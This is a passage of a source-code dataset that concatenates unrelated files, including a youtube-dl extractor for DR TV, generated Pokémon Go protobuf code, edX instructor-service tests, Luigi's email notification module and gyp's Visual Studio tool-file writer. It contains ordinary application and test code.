# # pc = pc->x;
# # continue;
# # case Split:
# # if(nready >= MAXTHREAD){
# # fprintf(stderr, "regexp overflow");
# # return -1;
# # }
# # /* queue new thread */
# # ready[nready++] = thread(pc->y, sp);
# # pc = pc->x; /* continue current thread */
# # continue;
# # }
# # }
# # Dead:;
# # }
# # return 0;
# #}
#
#
|
apixandru/intellij-community | refs/heads/master | python/testData/refactoring/introduceVariable/substringInStatement.after.py | 83 | a = 'foo'
x = '%sbar' % a |
cubicova17/annet | refs/heads/master | venv/lib/python2.7/site-packages/django/bin/daily_cleanup.py | 113 | #!/usr/bin/env python
"""
Daily cleanup job.
Can be run as a cronjob to clean out old data from the database (only expired
sessions at the moment).
"""
import warnings
from django.core import management
if __name__ == "__main__":
warnings.warn(
"The `daily_cleanup` script has been deprecated "
"in favor of `django-admin.py clearsessions`.",
DeprecationWarning)
management.call_command('clearsessions')
|
tashaxe/Red-DiscordBot | refs/heads/develop | lib/youtube_dl/extractor/drtv.py | 10 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
int_or_none,
float_or_none,
mimetype2ext,
parse_iso8601,
remove_end,
update_url_query,
)
class DRTVIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?dr\.dk/(?:tv/se|nyheder|radio/ondemand)/(?:[^/]+/)*(?P<id>[\da-z-]+)(?:[/#?]|$)'
_GEO_BYPASS = False
_GEO_COUNTRIES = ['DK']
IE_NAME = 'drtv'
_TESTS = [{
'url': 'https://www.dr.dk/tv/se/boern/ultra/klassen-ultra/klassen-darlig-taber-10',
'md5': '25e659cccc9a2ed956110a299fdf5983',
'info_dict': {
'id': 'klassen-darlig-taber-10',
'ext': 'mp4',
'title': 'Klassen - Dårlig taber (10)',
'description': 'md5:815fe1b7fa656ed80580f31e8b3c79aa',
'timestamp': 1471991907,
'upload_date': '20160823',
'duration': 606.84,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.dr.dk/nyheder/indland/live-christianias-rydning-af-pusher-street-er-i-gang',
'md5': '2c37175c718155930f939ef59952474a',
'info_dict': {
'id': 'christiania-pusher-street-ryddes-drdkrjpo',
'ext': 'mp4',
'title': 'LIVE Christianias rydning af Pusher Street er i gang',
'description': '- Det er det fedeste, der er sket i 20 år, fortæller christianit til DR Nyheder.',
'timestamp': 1472800279,
'upload_date': '20160902',
'duration': 131.4,
},
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
if '>Programmet er ikke længere tilgængeligt' in webpage:
raise ExtractorError(
'Video %s is not available' % video_id, expected=True)
video_id = self._search_regex(
(r'data-(?:material-identifier|episode-slug)="([^"]+)"',
r'data-resource="[^>"]+mu/programcard/expanded/([^"]+)"'),
webpage, 'video id')
programcard = self._download_json(
'http://www.dr.dk/mu/programcard/expanded/%s' % video_id,
video_id, 'Downloading video JSON')
data = programcard['Data'][0]
title = remove_end(self._og_search_title(
webpage, default=None), ' | TV | DR') or data['Title']
description = self._og_search_description(
webpage, default=None) or data.get('Description')
timestamp = parse_iso8601(data.get('CreatedTime'))
thumbnail = None
duration = None
restricted_to_denmark = False
formats = []
subtitles = {}
for asset in data['Assets']:
kind = asset.get('Kind')
if kind == 'Image':
thumbnail = asset.get('Uri')
elif kind in ('VideoResource', 'AudioResource'):
duration = float_or_none(asset.get('DurationInMilliseconds'), 1000)
restricted_to_denmark = asset.get('RestrictedToDenmark')
spoken_subtitles = asset.get('Target') == 'SpokenSubtitles'
for link in asset.get('Links', []):
uri = link.get('Uri')
if not uri:
continue
target = link.get('Target')
format_id = target or ''
preference = None
if spoken_subtitles:
preference = -1
format_id += '-spoken-subtitles'
if target == 'HDS':
f4m_formats = self._extract_f4m_formats(
uri + '?hdcore=3.3.0&plugin=aasp-3.3.0.99.43',
video_id, preference, f4m_id=format_id)
if kind == 'AudioResource':
for f in f4m_formats:
f['vcodec'] = 'none'
formats.extend(f4m_formats)
elif target == 'HLS':
formats.extend(self._extract_m3u8_formats(
uri, video_id, 'mp4', entry_protocol='m3u8_native',
preference=preference, m3u8_id=format_id))
else:
bitrate = link.get('Bitrate')
if bitrate:
format_id += '-%s' % bitrate
formats.append({
'url': uri,
'format_id': format_id,
'tbr': int_or_none(bitrate),
'ext': link.get('FileFormat'),
'vcodec': 'none' if kind == 'AudioResource' else None,
})
subtitles_list = asset.get('SubtitlesList')
if isinstance(subtitles_list, list):
LANGS = {
'Danish': 'da',
}
for subs in subtitles_list:
if not subs.get('Uri'):
continue
lang = subs.get('Language') or 'da'
subtitles.setdefault(LANGS.get(lang, lang), []).append({
'url': subs['Uri'],
'ext': mimetype2ext(subs.get('MimeType')) or 'vtt'
})
if not formats and restricted_to_denmark:
self.raise_geo_restricted(
'Unfortunately, DR is not allowed to show this program outside Denmark.',
countries=self._GEO_COUNTRIES)
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'timestamp': timestamp,
'duration': duration,
'formats': formats,
'subtitles': subtitles,
}
class DRTVLiveIE(InfoExtractor):
IE_NAME = 'drtv:live'
_VALID_URL = r'https?://(?:www\.)?dr\.dk/(?:tv|TV)/live/(?P<id>[\da-z-]+)'
_GEO_COUNTRIES = ['DK']
_TEST = {
'url': 'https://www.dr.dk/tv/live/dr1',
'info_dict': {
'id': 'dr1',
'ext': 'mp4',
'title': 're:^DR1 [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$',
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
channel_id = self._match_id(url)
channel_data = self._download_json(
'https://www.dr.dk/mu-online/api/1.0/channel/' + channel_id,
channel_id)
title = self._live_title(channel_data['Title'])
formats = []
for streaming_server in channel_data.get('StreamingServers', []):
server = streaming_server.get('Server')
if not server:
continue
link_type = streaming_server.get('LinkType')
for quality in streaming_server.get('Qualities', []):
for stream in quality.get('Streams', []):
stream_path = stream.get('Stream')
if not stream_path:
continue
stream_url = update_url_query(
'%s/%s' % (server, stream_path), {'b': ''})
if link_type == 'HLS':
formats.extend(self._extract_m3u8_formats(
stream_url, channel_id, 'mp4',
m3u8_id=link_type, fatal=False, live=True))
elif link_type == 'HDS':
formats.extend(self._extract_f4m_formats(update_url_query(
'%s/%s' % (server, stream_path), {'hdcore': '3.7.0'}),
channel_id, f4m_id=link_type, fatal=False))
self._sort_formats(formats)
return {
'id': channel_id,
'title': title,
'thumbnail': channel_data.get('PrimaryImageUri'),
'formats': formats,
'is_live': True,
}
|
obiben/pokemongo-api | refs/heads/master | pogo/POGOProtos/Data/Battle/BattleAction_pb2.py | 4 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Data/Battle/BattleAction.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Data.Battle import BattleResults_pb2 as POGOProtos_dot_Data_dot_Battle_dot_BattleResults__pb2
from POGOProtos.Data.Battle import BattleActionType_pb2 as POGOProtos_dot_Data_dot_Battle_dot_BattleActionType__pb2
from POGOProtos.Data.Battle import BattleParticipant_pb2 as POGOProtos_dot_Data_dot_Battle_dot_BattleParticipant__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Data/Battle/BattleAction.proto',
package='POGOProtos.Data.Battle',
syntax='proto3',
serialized_pb=_b('\n)POGOProtos/Data/Battle/BattleAction.proto\x12\x16POGOProtos.Data.Battle\x1a*POGOProtos/Data/Battle/BattleResults.proto\x1a-POGOProtos/Data/Battle/BattleActionType.proto\x1a.POGOProtos/Data/Battle/BattleParticipant.proto\"\x85\x04\n\x0c\x42\x61ttleAction\x12\x36\n\x04Type\x18\x01 \x01(\x0e\x32(.POGOProtos.Data.Battle.BattleActionType\x12\x17\n\x0f\x61\x63tion_start_ms\x18\x02 \x01(\x03\x12\x13\n\x0b\x64uration_ms\x18\x03 \x01(\x05\x12\x14\n\x0c\x65nergy_delta\x18\x05 \x01(\x05\x12\x16\n\x0e\x61ttacker_index\x18\x06 \x01(\x05\x12\x14\n\x0ctarget_index\x18\x07 \x01(\x05\x12\x19\n\x11\x61\x63tive_pokemon_id\x18\x08 \x01(\x04\x12@\n\rplayer_joined\x18\t \x01(\x0b\x32).POGOProtos.Data.Battle.BattleParticipant\x12=\n\x0e\x62\x61ttle_results\x18\n \x01(\x0b\x32%.POGOProtos.Data.Battle.BattleResults\x12*\n\"damage_windows_start_timestamp_mss\x18\x0b \x01(\x03\x12(\n damage_windows_end_timestamp_mss\x18\x0c \x01(\x03\x12>\n\x0bplayer_left\x18\r \x01(\x0b\x32).POGOProtos.Data.Battle.BattleParticipant\x12\x19\n\x11target_pokemon_id\x18\x0e \x01(\x04\x62\x06proto3')
,
dependencies=[POGOProtos_dot_Data_dot_Battle_dot_BattleResults__pb2.DESCRIPTOR,POGOProtos_dot_Data_dot_Battle_dot_BattleActionType__pb2.DESCRIPTOR,POGOProtos_dot_Data_dot_Battle_dot_BattleParticipant__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_BATTLEACTION = _descriptor.Descriptor(
name='BattleAction',
full_name='POGOProtos.Data.Battle.BattleAction',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Type', full_name='POGOProtos.Data.Battle.BattleAction.Type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='action_start_ms', full_name='POGOProtos.Data.Battle.BattleAction.action_start_ms', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='duration_ms', full_name='POGOProtos.Data.Battle.BattleAction.duration_ms', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='energy_delta', full_name='POGOProtos.Data.Battle.BattleAction.energy_delta', index=3,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attacker_index', full_name='POGOProtos.Data.Battle.BattleAction.attacker_index', index=4,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='target_index', full_name='POGOProtos.Data.Battle.BattleAction.target_index', index=5,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='active_pokemon_id', full_name='POGOProtos.Data.Battle.BattleAction.active_pokemon_id', index=6,
number=8, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_joined', full_name='POGOProtos.Data.Battle.BattleAction.player_joined', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='battle_results', full_name='POGOProtos.Data.Battle.BattleAction.battle_results', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='damage_windows_start_timestamp_mss', full_name='POGOProtos.Data.Battle.BattleAction.damage_windows_start_timestamp_mss', index=9,
number=11, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='damage_windows_end_timestamp_mss', full_name='POGOProtos.Data.Battle.BattleAction.damage_windows_end_timestamp_mss', index=10,
number=12, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_left', full_name='POGOProtos.Data.Battle.BattleAction.player_left', index=11,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='target_pokemon_id', full_name='POGOProtos.Data.Battle.BattleAction.target_pokemon_id', index=12,
number=14, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=209,
serialized_end=726,
)
_BATTLEACTION.fields_by_name['Type'].enum_type = POGOProtos_dot_Data_dot_Battle_dot_BattleActionType__pb2._BATTLEACTIONTYPE
_BATTLEACTION.fields_by_name['player_joined'].message_type = POGOProtos_dot_Data_dot_Battle_dot_BattleParticipant__pb2._BATTLEPARTICIPANT
_BATTLEACTION.fields_by_name['battle_results'].message_type = POGOProtos_dot_Data_dot_Battle_dot_BattleResults__pb2._BATTLERESULTS
_BATTLEACTION.fields_by_name['player_left'].message_type = POGOProtos_dot_Data_dot_Battle_dot_BattleParticipant__pb2._BATTLEPARTICIPANT
DESCRIPTOR.message_types_by_name['BattleAction'] = _BATTLEACTION
BattleAction = _reflection.GeneratedProtocolMessageType('BattleAction', (_message.Message,), dict(
DESCRIPTOR = _BATTLEACTION,
__module__ = 'POGOProtos.Data.Battle.BattleAction_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Data.Battle.BattleAction)
))
_sym_db.RegisterMessage(BattleAction)
# @@protoc_insertion_point(module_scope)
|
cpollard1001/FreeCAD_sf_master | refs/heads/master | src/Mod/Material/Init.py | 29 | #***************************************************************************
#* *
#* Copyright (c) 2013 - Juergen Riegel <[email protected]> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
# import for the FreeCAD Material card
FreeCAD.addImportType("FreeCAD Material Card (*.FCMat)","importFCMat")
|
pixelgremlins/ztruck | refs/heads/master | dj/lib/python2.7/fnmatch.py | 4 | /usr/lib/python2.7/fnmatch.py |
fintech-circle/edx-platform | refs/heads/master | lms/djangoapps/instructor/tests/test_services.py | 10 | """
Tests for the InstructorService
"""
import json
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from courseware.models import StudentModule
from lms.djangoapps.instructor.access import allow_access
from lms.djangoapps.instructor.services import InstructorService
from lms.djangoapps.instructor.tests.test_tools import msk_from_problem_urlname
from nose.plugins.attrib import attr
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
import mock
@attr(shard=1)
class InstructorServiceTests(SharedModuleStoreTestCase):
"""
Tests for the InstructorService
"""
@classmethod
def setUpClass(cls):
super(InstructorServiceTests, cls).setUpClass()
cls.course = CourseFactory.create()
cls.problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-problem-urlname'
)
cls.other_problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-other_problem-urlname'
)
cls.problem_urlname = unicode(cls.problem_location)
cls.other_problem_urlname = unicode(cls.other_problem_location)
def setUp(self):
super(InstructorServiceTests, self).setUp()
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.service = InstructorService()
self.module_to_reset = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.problem_location,
state=json.dumps({'attempts': 2}),
)
@mock.patch('lms.djangoapps.grades.signals.handlers.PROBLEM_WEIGHTED_SCORE_CHANGED.send')
def test_reset_student_attempts_delete(self, _mock_signal):
"""
Test delete student state.
"""
# make sure the attempt is there
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.course.id,
module_state_key=self.module_to_reset.module_state_key,
).count(),
1
)
self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
self.problem_urlname,
requesting_user=self.student,
)
# make sure the module has been deleted
self.assertEqual(
StudentModule.objects.filter(
student=self.module_to_reset.student,
course_id=self.course.id,
module_state_key=self.module_to_reset.module_state_key,
).count(),
0
)
def test_reset_bad_content_id(self):
"""
Negative test of trying to reset attempts with bad content_id
"""
result = self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
'foo/bar/baz',
requesting_user=self.student,
)
self.assertIsNone(result)
def test_reset_bad_user(self):
"""
Negative test of trying to reset attempts with bad user identifier
"""
result = self.service.delete_student_attempt(
'bad_student',
unicode(self.course.id),
'foo/bar/baz',
requesting_user=self.student,
)
self.assertIsNone(result)
def test_reset_non_existing_attempt(self):
"""
        Negative test of trying to reset a non-existing attempt
"""
result = self.service.delete_student_attempt(
self.student.username,
unicode(self.course.id),
self.other_problem_urlname,
requesting_user=self.student,
)
self.assertIsNone(result)
def test_is_user_staff(self):
"""
Test to assert that the user is staff or not
"""
result = self.service.is_course_staff(
self.student,
unicode(self.course.id)
)
self.assertFalse(result)
# allow staff access to the student
allow_access(self.course, self.student, 'staff')
result = self.service.is_course_staff(
self.student,
unicode(self.course.id)
)
self.assertTrue(result)
def test_report_suspicious_attempt(self):
"""
Test to verify that the create_zendesk_ticket() is called
"""
requester_name = "edx-proctoring"
email = "[email protected]"
subject = "Proctored Exam Review: {review_status}".format(review_status="Suspicious")
body = "A proctored exam attempt for {exam_name} in {course_name} by username: {student_username} was " \
"reviewed as {review_status} by the proctored exam review provider."
body = body.format(
exam_name="test_exam", course_name=self.course.display_name, student_username="test_student",
review_status="Suspicious"
)
tags = ["proctoring"]
with mock.patch("lms.djangoapps.instructor.services.create_zendesk_ticket") as mock_create_zendesk_ticket:
self.service.send_support_notification(
course_id=unicode(self.course.id),
exam_name="test_exam",
student_username="test_student",
review_status="Suspicious"
)
mock_create_zendesk_ticket.assert_called_with(requester_name, email, subject, body, tags)
|
vektorlab/multivac | refs/heads/master | multivac/util.py | 2 | from datetime import datetime
def unix_time(dt):
epoch = datetime.utcfromtimestamp(0)
delta = dt - epoch
return int(round(delta.total_seconds()))
def format_time(unix_time):
if isinstance(unix_time, str):
unix_time = int(unix_time)
return datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d %H:%M:%S')
|
linsomniac/luigi | refs/heads/master | luigi/notifications.py | 3 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
''' Supports sending emails when tasks fail.
This needs some more documentation.
See :doc:`/configuration` for configuration options.
In particular, setting the `error-email` config value should make Luigi send emails when tasks fail.
.. code-block:: ini
[core]
[email protected]
TODO: Eventually, all email configuration should move into the [email] section.
'''
import logging
import socket
import sys
import textwrap
from luigi import configuration
import luigi.task
import luigi.parameter
logger = logging.getLogger("luigi-interface")
DEFAULT_CLIENT_EMAIL = 'luigi-client@%s' % socket.gethostname()
DEBUG = False
class TestNotificationsTask(luigi.task.Task):
"""
    You may invoke this task to quickly check if you have correctly set up your
    notifications configuration. You can run:
.. code-block:: console
$ luigi TestNotifications --local-scheduler
And then check your email inbox to see if you got an error email or any
other kind of notifications that you expected.
"""
raise_in_complete = luigi.parameter.BoolParameter(description='If true, fail in complete() instead of run()')
def run(self):
raise ValueError('Testing notifications triggering')
def complete(self):
if self.raise_in_complete:
raise ValueError('Testing notifications triggering')
return False
def email_type():
return configuration.get_config().get('core', 'email-type', 'plain')
def generate_email(sender, subject, message, recipients, image_png):
import email
import email.mime
import email.mime.multipart
import email.mime.text
import email.mime.image
msg_root = email.mime.multipart.MIMEMultipart('related')
msg_text = email.mime.text.MIMEText(message, email_type())
msg_text.set_charset('utf-8')
msg_root.attach(msg_text)
if image_png:
with open(image_png, 'rb') as fp:
msg_image = email.mime.image.MIMEImage(fp.read(), 'png')
msg_root.attach(msg_image)
msg_root['Subject'] = subject
msg_root['From'] = sender
msg_root['To'] = ','.join(recipients)
return msg_root
def wrap_traceback(traceback):
"""
For internal use only (until further notice)
"""
if email_type() == 'html':
try:
from pygments import highlight
from pygments.lexers import PythonTracebackLexer
from pygments.formatters import HtmlFormatter
with_pygments = True
except ImportError:
with_pygments = False
if with_pygments:
formatter = HtmlFormatter(noclasses=True)
wrapped = highlight(traceback, PythonTracebackLexer(), formatter)
else:
wrapped = '<pre>%s</pre>' % traceback
else:
wrapped = traceback
return wrapped
def send_email_smtp(config, sender, subject, message, recipients, image_png):
import smtplib
smtp_ssl = config.getboolean('core', 'smtp_ssl', False)
smtp_without_tls = config.getboolean('core', 'smtp_without_tls', False)
smtp_host = config.get('core', 'smtp_host', 'localhost')
smtp_port = config.getint('core', 'smtp_port', 0)
smtp_local_hostname = config.get('core', 'smtp_local_hostname', None)
smtp_timeout = config.getfloat('core', 'smtp_timeout', None)
kwargs = dict(host=smtp_host, port=smtp_port, local_hostname=smtp_local_hostname)
if smtp_timeout:
kwargs['timeout'] = smtp_timeout
smtp_login = config.get('core', 'smtp_login', None)
smtp_password = config.get('core', 'smtp_password', None)
smtp = smtplib.SMTP(**kwargs) if not smtp_ssl else smtplib.SMTP_SSL(**kwargs)
smtp.ehlo_or_helo_if_needed()
if smtp.has_extn('starttls') and not smtp_without_tls:
smtp.starttls()
if smtp_login and smtp_password:
smtp.login(smtp_login, smtp_password)
msg_root = generate_email(sender, subject, message, recipients, image_png)
smtp.sendmail(sender, recipients, msg_root.as_string())
def send_email_ses(config, sender, subject, message, recipients, image_png):
"""
Sends notification through AWS SES.
Does not handle access keys. Use either
1/ configuration file
2/ EC2 instance profile
See also https://boto3.readthedocs.io/en/latest/guide/configuration.html.
"""
from boto3 import client as boto3_client
client = boto3_client('ses')
msg_root = generate_email(sender, subject, message, recipients, image_png)
response = client.send_raw_email(Source=sender,
Destinations=recipients,
RawMessage={'Data': msg_root.as_string()})
logger.debug(("Message sent to SES.\nMessageId: {},\nRequestId: {},\n"
"HTTPSStatusCode: {}").format(response['MessageId'],
response['ResponseMetadata']['RequestId'],
response['ResponseMetadata']['HTTPStatusCode']))
def send_email_sendgrid(config, sender, subject, message, recipients, image_png):
import sendgrid
client = sendgrid.SendGridClient(config.get('email', 'SENDGRID_USERNAME', None),
config.get('email', 'SENDGRID_PASSWORD', None),
raise_errors=True)
to_send = sendgrid.Mail()
to_send.add_to(recipients)
to_send.set_from(sender)
to_send.set_subject(subject)
if email_type() == 'html':
to_send.set_html(message)
else:
to_send.set_text(message)
if image_png:
to_send.add_attachment(image_png)
client.send(to_send)
def _email_disabled():
if email_type() == 'none':
logger.info("Not sending email when email-type is none")
return True
elif configuration.get_config().getboolean('email', 'force-send', False):
return False
elif sys.stdout.isatty():
logger.info("Not sending email when running from a tty")
return True
elif DEBUG:
logger.info("Not sending email when running in debug mode")
else:
return False
def send_email_sns(config, sender, subject, message, topic_ARN, image_png):
"""
Sends notification through AWS SNS. Takes Topic ARN from recipients.
Does not handle access keys. Use either
1/ configuration file
2/ EC2 instance profile
See also https://boto3.readthedocs.io/en/latest/guide/configuration.html.
"""
from boto3 import resource as boto3_resource
sns = boto3_resource('sns')
topic = sns.Topic(topic_ARN[0])
# Subject is max 100 chars
if len(subject) > 100:
subject = subject[0:48] + '...' + subject[-49:]
response = topic.publish(Subject=subject, Message=message)
logger.debug(("Message sent to SNS.\nMessageId: {},\nRequestId: {},\n"
"HTTPSStatusCode: {}").format(response['MessageId'],
response['ResponseMetadata']['RequestId'],
response['ResponseMetadata']['HTTPStatusCode']))
def send_email(subject, message, sender, recipients, image_png=None):
"""
    Decides whether to send a notification. The notification is cancelled if there
    are no recipients, if stdout is attached to a tty, or if running in debug mode.
Dispatches on config value email.type. Default is 'smtp'.
"""
config = configuration.get_config()
notifiers = {'ses': send_email_ses,
'sendgrid': send_email_sendgrid,
'smtp': send_email_smtp,
'sns': send_email_sns}
subject = _prefix(subject)
if not recipients or recipients == (None,):
return
if _email_disabled():
return
# Clean the recipients lists to allow multiple error-email addresses, comma
# separated in luigi.cfg
recipients_tmp = []
for r in recipients:
recipients_tmp.extend([a.strip() for a in r.split(',') if a.strip()])
# Replace original recipients with the clean list
recipients = recipients_tmp
# Get appropriate sender and call it to send the notification
email_sender_type = config.get('email', 'type', None)
email_sender = notifiers.get(email_sender_type, send_email_smtp)
email_sender(config, sender, subject, message, recipients, image_png)
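# Illustrative sketch added for this listing (not part of Luigi): a typical call
# to send_email().  The addresses below are placeholders; the backend actually
# used (smtp, ses, sendgrid or sns) is chosen via the `type` option in the
# [email] section.
def _example_send_email():
    send_email(
        subject='Luigi: MyTask FAILED',
        message='Traceback (most recent call last): ...',
        sender='[email protected]',
        recipients=('[email protected]',),
    )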
def _email_recipients(additional_recipients=None):
config = configuration.get_config()
receiver = config.get('core', 'error-email', None)
recipients = [receiver] if receiver else []
if additional_recipients:
if isinstance(additional_recipients, str):
recipients.append(additional_recipients)
else:
recipients.extend(additional_recipients)
return recipients
def send_error_email(subject, message, additional_recipients=None):
"""
Sends an email to the configured error-email.
If no error-email is configured, then a message is logged.
"""
config = configuration.get_config()
recipients = _email_recipients(additional_recipients)
if recipients:
sender = config.get('core', 'email-sender', DEFAULT_CLIENT_EMAIL)
logger.info("Sending warning email to %r", recipients)
send_email(
subject=subject,
message=message,
sender=sender,
recipients=recipients
)
else:
logger.info("Skipping error email. Set `error-email` in the `core` "
"section of the luigi config file or override `owner_email`"
"in the task to receive error emails.")
def _prefix(subject):
"""
If the config has a special prefix for emails then this function adds
this prefix.
"""
config = configuration.get_config()
email_prefix = config.get('core', 'email-prefix', None)
if email_prefix is not None:
subject = "%s %s" % (email_prefix, subject)
return subject
def format_task_error(headline, task, command, formatted_exception=None):
"""
Format a message body for an error email related to a luigi.task.Task
:param headline: Summary line for the message
    :param task: `luigi.task.Task` instance where this error occurred
    :param command: the command line that was used to run the task, shown in the message body
    :param formatted_exception: optional string showing traceback
:return: message body
"""
typ = email_type()
if formatted_exception:
formatted_exception = wrap_traceback(formatted_exception)
else:
formatted_exception = ""
if typ == 'html':
msg_template = textwrap.dedent('''
<html>
<body>
<h2>{headline}</h2>
<table style="border-top: 1px solid black; border-bottom: 1px solid black">
<thead>
<tr><th>name</th><td>{name}</td></tr>
</thead>
<tbody>
{param_rows}
</tbody>
</table>
</pre>
<h2>Command line</h2>
<pre>
{command}
</pre>
<h2>Traceback</h2>
{traceback}
</body>
</html>
''')
str_params = task.to_str_params()
params = '\n'.join('<tr><th>{}</th><td>{}</td></tr>'.format(*items) for items in str_params.items())
body = msg_template.format(headline=headline, name=task.task_family, param_rows=params,
command=command, traceback=formatted_exception)
else:
msg_template = textwrap.dedent('''\
{headline}
Name: {name}
Parameters:
{params}
Command line:
{command}
{traceback}
''')
str_params = task.to_str_params()
max_width = max([0] + [len(x) for x in str_params.keys()])
params = '\n'.join(' {:{width}}: {}'.format(*items, width=max_width) for items in str_params.items())
body = msg_template.format(headline=headline, name=task.task_family, params=params,
command=command, traceback=formatted_exception)
return body
|
itomg/node-gyp | refs/heads/master | gyp/pylib/gyp/MSVSToolFile.py | 2736 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio project reader/writer."""
import gyp.common
import gyp.easy_xml as easy_xml
class Writer(object):
"""Visual Studio XML tool file writer."""
def __init__(self, tool_file_path, name):
"""Initializes the tool file.
Args:
tool_file_path: Path to the tool file.
name: Name of the tool file.
"""
self.tool_file_path = tool_file_path
self.name = name
self.rules_section = ['Rules']
def AddCustomBuildRule(self, name, cmd, description,
additional_dependencies,
outputs, extensions):
"""Adds a rule to the tool file.
Args:
name: Name of the rule.
description: Description of the rule.
cmd: Command line of the rule.
additional_dependencies: other files which may trigger the rule.
outputs: outputs of the rule.
extensions: extensions handled by the rule.
"""
rule = ['CustomBuildRule',
{'Name': name,
'ExecutionDescription': description,
'CommandLine': cmd,
'Outputs': ';'.join(outputs),
'FileExtensions': ';'.join(extensions),
'AdditionalDependencies':
';'.join(additional_dependencies)
}]
self.rules_section.append(rule)
def WriteIfChanged(self):
"""Writes the tool file."""
content = ['VisualStudioToolFile',
{'Version': '8.00',
'Name': self.name
},
self.rules_section
]
easy_xml.WriteXmlIfChanged(content, self.tool_file_path,
encoding="Windows-1252")
|
